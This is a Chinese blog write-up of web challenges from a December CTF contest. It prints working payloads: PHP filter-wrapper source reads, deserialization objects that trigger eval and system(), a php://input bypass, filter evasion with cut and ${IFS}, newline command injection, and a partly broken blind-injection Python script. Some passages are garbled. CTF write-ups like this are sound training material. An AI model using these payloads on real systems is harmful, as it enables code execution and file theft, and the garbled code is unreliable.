网络内生安全试验场-12月CTF圣诞赛Web

最新推荐文章于 2021-03-23 20:58:13 发布
最新推荐文章于 2021-03-23 20:58:13 发布
阅读量495 收藏
点赞数 1
分类专栏: web安全 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44902875/article/details/104025468
版权

1. nani
http://120.55.43.255:24719/查看源码得以下内容,其URL提示文件包含
在这里插入图片描述在这里插入图片描述
查看http://120.55.43.255:24719/index.php?file=show.php得

使用http://120.55.43.255:24719/index.php?file=php://filter/read=convert.base64-encode/resource=./user.php
在这里插入图片描述
使用base64解密
在这里插入图片描述

<?php class convent{ var $warn = "No hacker."; function __destruct(){ eval($this->warn); } function __wakeup(){ foreach(get_object_vars($this) as $k => $v) { $this->$k = null; } } } $cmd = $_POST[cmd]; unserialize($cmd); ?>

在这里插入图片描述
构造payload:
cmd=O:7:“convent”:2:{s:4:“warn”;s:14:“system(‘dir’);”;}
在这里插入图片描述
2. Xlmg
Stegsolve图片隐写查看器的使用手册:
在Analyse中:
File Format:文件格式
Data Extract:数据提取
Steregram Solve:立体试图 可以左右控制偏移
Frame Browser:帧浏览器
Image Combiner:拼图,图片拼接
其中data extract右边部分表示RGBA(Alpha是透明度)的颜色通道,而rgba是代表Red(红色)Green(绿色)Blue(蓝色)和Alpha的色彩空间。它们代表的实际上是亮度。右半部分就是Extra By(额外的)和Bit Order(位顺序)和Bit Plane Order(位平面的顺序)
在这里插入图片描述
3. random

<?php $seed = 2; $key = @$_REQUEST['key']; mt_srand($seed); $true_key = mt_rand(); echo $true_key ?>

出$key == t r u e k e y 接 着 根 据 提 示 , 存 在 文 件 包 含 。 先 闭 合 v a r d u m p ( true_key 接着根据提示,存在文件包含。先闭合var_dump( truekeyvardump(a)既构造得?hello=1);print_r(file_(“./flag.php”));//&seed=2&key=1216699170
在这里插入图片描述
4.Admin
http://120.55.43.255:28119/

在这里插入图片描述在这里插入图片描述
isset()函数:就是判断变量是否存在并且不为空,存在返回ture,不存在返回false。
file_get_contents() 函数:是用于将文件的内容读入到一个字符串中的首选方法。
include( f i l e ) ; / / c l a s s . p h p : 意 思 是 让 我 们 输 出 h e l l o a d m i n ! , 然 后 执 行 文 件 包 含 漏 洞 。 所 以 , 我 们 应 该 想 办 法 让 f i l e g e t c o n t e n t s ( file); //class.php: 意思是让我们输出hello admin!,然后执行文件包含漏洞。 所以,我们应该想办法让file_get_contents( file);//class.php:helloadmin!filegetcontents(user,‘r’)的内容变成admin就可以绕过file_get_contents,这里用的方法是使用php的封装协议—— php://input。php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。
在这里插入图片描述
绕过第一个,紧接着文件包含file=php://filter/convert.base64-encode/resource=class.php构造得到http://120.55.43.255:28119/?user=php://input&file=php://filter/convert.base64-encode/resource=class
在这里插入图片描述
解码
在这里插入图片描述
反序列pass=O:4:“Read”:1:{s:4:“file”;s:62:“php://filter/read=convert.base64-encode/resource=fffffflag.php”;}既?user=php://input&file=class.php&pass=O:4:“Read”:1:{s:4:“file”;s:62:“php://filter/read=convert.base64-encode/resource=fffffflag.php”;}后面一个文件包含加反序列。
在这里插入图片描述
解码
在这里插入图片描述
5.Post1
过滤了cat,空格。使用cut、$ {IFS }来代替
构造palyload:a=cut$ {IFS }-b1-$ {IFS }flag.txt
在这里插入图片描述
6.Ping
strcmp ():进行二进制安全字符串比较,用来判断password是否一致
include($_REQUEST[‘path’]):文件包含,传入的参数是path
使用password[]绕过
在这里插入图片描述
?path=php://filter//read=convert.base64-encode/resource=ping.php
在这里插入图片描述
解码
在这里插入图片描述
过滤了一些分隔符,可以使用%0a换行符符号–。
在这里插入图片描述
Cat ffffff1111aagggg.txt
在这里插入图片描述
7.Post2(半成)
使用代码
Import requests
Import string
dic = string.printable
flag = “”
for j in range(1,50):
for i in range(len(dic)):
url = http://120.55.43.255:22712/
date = {“cmd” : ‘’’[ ‘cut -c | ‘’’+str(j)+’’’ flag.txt‘ = “%c” ]}
try:
r = request.post(url,data=data,time=1)
except requests.exceptions.ReadTimeout,e:
flag += dic[i]
print flag
break

佛性死磕
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2020年第六届“湖湘杯”网络安全技能大洞庭决-互联网选拔-第二场-线上CTF.zip
11-01
【标】: 2020年第六届“湖湘杯”网络安全技能大洞庭决-互联网选拔-第二场-线上CTF 【描述】: 这个压缩包文件包含了2020年第六届“湖湘杯”网络安全技能大洞庭决中,互联网选拔第二场的线上CTF...
河南省网络安全高校战队联盟CTF训练营-web文件上传第一期
04-22
"河南省网络安全高校战队联盟CTF训练营-web文件上传第一期" 这个标揭示了本次训练的主,主要聚焦于网络安全领域中的一项重要技能——Web文件上传漏洞的利用与防御。CTF(Capture The Flag)是网络安全的一种...
网络内生安全试验场-201909-SQL-wp
weixin_42444939的博客
09-19 325
fuzz发现几个重要过滤点 (包括 ’ , = , select , sleep 等) 以下为未过滤的sql注入关键词 那么现在来捋下思路,select被ban,意味着爆库名表名这条路走不通 考虑从爆password入手(当然,听学长说貌似也可以尝试堆叠,但我尝试后发现insert和sleep等被过滤,也就不再继续) 绕过细节: %20用/**/代替 substr和=的组合用regexp代替...
i春秋网络内生安全试验场CTF夺旗(第二季)部分wp
qq_42188168的博客
10-26 919
i春秋 2019-10CTF夺旗 web部分wp 1.easyphp 通过观察可以发现img传参base64解码;同样的方法可得index.php源码 之后构造序列化。。。。。 2、calculate1,2 写wp前删掉了脚本,简述下:利用selenium运算公式并结合chromedriver进行10次提交 3、babysql 之后测试admin’orderby 1# 到3,直到4...
ctf-writeup-迎圣诞拿大奖-SQLi
key_nothing的博客
08-06 346
打开连接,出现一个登录框: 尝试:扫目录、弱口令、源代码都没有什么发现 目为sqli 猜测sql注入应该在登录处,转包丢sqlmap先跑一发,也没有结果。 尝试手工测一下,发现在用户名处输入%时居然有报错! 看报错提示,有sprintf()错误,瞬间想起了这个函数有格式化字符串漏洞,抓包尝试一番。 sprintf注入,或者说php格式化字符串注入的原理为: 要明白%后的一个字符(除了%,%...
[CTF]公司“DSFM-圣诞狂欢”杯安全技能writeup
第八个男人
01-04 661
1. Helloeveryone 2048的小游戏,不用真正打通关,直接F12即可。 2. 数论 s=m*p%q,要求出m,就可以得到flag。 python脚本: p = int('0x9dfe6f4722f783589a955fe381d0308541dc2af910f525008b6265a294eff48846343c59',16) q = int('0xbf80113b43da6b0ad6bf32ba38ead7c936b97c775d3e728dc50d33a21d5e296c.
I春秋第四季CTF-Web-Writeup(部分)
1stPeak's Blog
02-21 1631
PHP反序列化 目总共有三个php文件 第一个:index.php 第二个:show.php 第三个:user.php 目:http://120.55.43.255:24719,进去后没有看见任何东西 我们查看源代码:发现了一个链接 接下来,我们访问该链接,看看有什么 哦?那我们再看看user.php里有什么,什么都没有 接下来使用php伪协议分别获取index.php、show.php、us...
ctf-web网络安全课程视频.zip
10-19
1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-字符串编码识别工具,网络安全CTF的好帮手!
06-10
网络安全领域,特别是参与Capture The Flag (CTF)竞时,了解和掌握各种字符串编码识别工具至关重要。CTF通常包含多种类型的问,其中MISC(Miscellaneous)型涉及广泛,包括密码学、逆向工程、取证分析等...
ctf web 找flag夺旗概述、原理及应用.pdf
最新发布
05-13
CTF(Capture The Flag,夺旗)在网络安全领域中是一种流行的技术竞技比形式,尤其在Web安全领域。以下是关于CTF Web、找flag夺旗的概述、原理及应用: 概述: CTF WebCTF中的一种型,主要...
Bugku旧平台web writeup
a370793934的专栏
11-27 2374
Web基础 Web2 查看网页源代码,搜索flag KEY{Web-2-bugKssNNikls9100} 计算器 审查元素修改输入字符串长度为2 flag{CTF-bugku-0032} web基础$_GET http://123.206.87.240:8002/get/?what=flag flag{bugku_get_su8kej2en} web基础$_...
php talk99,CTF目实战:2019-Hgame-Web-Week4 - 嘶吼 RoarTalk – 回归最本质的信息安全,互联网安全新媒体,4hou.com...
weixin_28929201的博客
03-23 317
前言最近利用空余时间做了一下Hgame,以下是部分web解。happyPython信息搜集发现是flask,随手测试一下。http://118.25.18.223:3001/{{1+1}}发现可能存在SSTI,打了几发payload,发现都是500,想到测试一下过滤。http://118.25.18.223:3001/%7B%7B'aa'.upper()%7D%7D发现将()替换成了空。SEC...
2020 DASCTF&BJD 部分
yemeinanhai的博客
12-26 3643
呜呜圣诞节还要打比我太难了,但结果还不错的样子~ 没有0解 拿了FakePic的一血 混进了前四十有电子证书(呜呜,学到现在终于要有证书了) 下面就是WP了 Misc 马老师的秘籍 下载得到一张全是二维码的图片,扫描了几个发现每个二维码都是马老师经典语录中的3个字,没发现什么有用的信息。怀疑要么flag在其中的几张二维码里,要么是全部扫出来连起来是密文,然后卡了好久…过了半小时,才想起来misc拿到图片不应该先看看是不是可以分离吗… 于是binwalk一番发现含有zip,用fore
i春秋网络内生安全试验场CTF夺旗(第四季)12web write up
来到了学渣的博客
12-27 2233
主也是个刚入门的小菜鸡,而且最近临近期末,无奈能力有限只能作出部分web(未完待续…) 目:nani 看源码有提示, 构造语句读取user.php http://120.55.43.255:24719/index.php?file=php://filter/read=convert.base64-encode/resource=user.php base64解码,得出源码 <?php ...
DASCTF团队(2020)-部分WP
~airrudder~
06-27 4072
本篇内容 MISC: Keyboard 透明度 Crypto: Gemini_Man Web: 简单的计算1 简单的计算2 phpuns Reverse: easy_maze 上一篇 | 目录 | 下一篇 刚打了DASCTF团队,情况虽不是很理想,但也记录一下团队解情况。 Keyboard 尝试了很久发现没思路,搜索一下,发现是安恒DASCTF战原,甚至连flag都没变。 //查找含“keyboard”的文件 volatility -f Keyboard.raw .
安恒-dasctf 部分writeup
zhang14916的博客
04-26 3万+
1.crypto-not rsa 目很简单,r是一个随机数,g=n+1,已知(pow(g,m,n*n)*pow(r,n,n*n))%(n*n)=c,即密文c,求解明文m。我们根据二项式定理易知可将pow(g,m,n*n)=pow(n+1,m,n*n)=pow(m*n+1,n*n)。由于n=p*q,所以我们知道phi(n*n)=p*(p-1)*q*(q-1)。我们对加密公式两侧同时加(p-1)*...
i春秋“网络内生安全试验场CTF夺旗(第四季)部分目WP
李熠专用博客_白帽子一枚,人称低危终结者
12-30 2819
1.nani 构造payload,拿到user.php源码:http://120.55.43.255:24719/?file=php://filter/read=convert.base64-encode/resource=./user.php <?php class convent{ var $warn = "No hacker."; function __destruct(){ ...
2020 DASCTF&BJD MISC WriteUp
七月的博客
12-28 1152
2020 DASCTF&BJD MISC WriteUp 这次比队里的大师傅们太强惹,只会做MISC, 马老师的秘籍 打开得到一张全是二维码的png图片,下载下来 按顺序扫码后得到: 呃朋友们好啊我是某某门掌髣ィ莠コ鬩ャ某某刚才有个譛句暑髣ョ我马老师发生什么事了我说諤惹ケ亥屓事给我发了几张截图我一看嗷原来是昨天譛我ク、荳ェ蟷エ霓サ莠コ三十多岁一个体重九十多公斤一个体重八十多公譁、莉紋サャ隸エ蜚画怏一个说是我在健身房练功颈椎练坏了马老师你能不能教教我浑元功法遏ョ蟶ョ蜉ゥ治疗一下我的鬚域、守羅謌題ッ
CTF中Crypty(密码类)入门必看
热门推荐
成长之路
07-22 3万+
常见编码 ASCII编码 ASCII码大致可以分为三部分组成: 第一部分是:ASCII非打印控制字符 第二部分是:ASCII打印字符; 第三部分是:扩展ASCII打印字符。 在线ASCII码与进制互相转换 这是ASCII码表   具体分析链接ASCII码详解 base64,32,16,编码 这里我们拿常见的base64来举例 原理:base64是一种基于64个可打印字符...
网络安全自学笔记:实验吧CTF实战-WEB渗透与隐写术解析
"网络安全自学篇, CTF实战, WEB渗透, 隐写术, Chrome浏览器, Jother编码, BurpSuite, SQLMAP, Fiddler" 在网络安全领域,尤其是对于初学者来说,了解并实践CTF(Capture The Flag)实战是一种很好的学习方式。"04....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值